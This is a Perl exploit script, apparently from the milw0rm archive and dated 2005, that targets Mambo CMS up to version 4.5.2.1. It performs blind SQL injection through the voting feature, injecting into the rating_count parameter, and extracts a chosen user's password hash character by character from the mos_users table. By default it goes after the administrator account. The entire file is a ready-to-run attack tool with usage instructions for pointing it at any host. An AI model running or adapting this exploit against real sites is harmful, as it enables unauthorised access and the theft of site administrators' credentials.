#!/usr/bin/perl ### Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### (c)oded by 1dt.w0lf , 21.06.05 ### http://rst.void.ru , http://ghc.ru ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO::Socket; if (@ARGV < 3) { &usage; } $server = $ARGV[0]; $path = $ARGV[1]; $member_id = $ARGV[2]; $news_id = 1; $news_itemid = 1; $server =~ s!(http:\/\/)!!; $request = 'http://'; $request .= $server; $request .= $path; $s_num = 1; $|++; $n = 0; &head; print "\r\n"; print " [~] SERVER : $server\r\n"; print " [~] PATH : $path\r\n"; print " [~] USER ID : $member_id\r\n"; print " [~] SEARCHING PASSWORD ... [|]"; while(1) { if(&found(47,58)==0) { &found(96,103); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] --------------------------------------------------------------- USER ID : $member_id HASH : $allchar --------------------------------------------------------------- }; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr($char); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server); sleep 1; $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1 HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$news_id,$news_itemid,$server); while(<$sock2>) { if (/1145711457/) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub usage() { &head; print q( USAGE r57mambo.pl [HOST] [/FOLDER/] [USER_ID] OPTIONS HOST - Host where mambo installed FOLDER - Folder where mambo installed USER_ID - User ID for brute (default is 62 for admin) E.G. r57mambo.pl http://blah.com /mambo/ 62 --------------------------------------------------------------- (c)oded by 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru ); exit(); } sub head() { print q( --------------------------------------------------------------- Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC --------------------------------------------------------------- ); } # milw0rm.com [2005-06-21]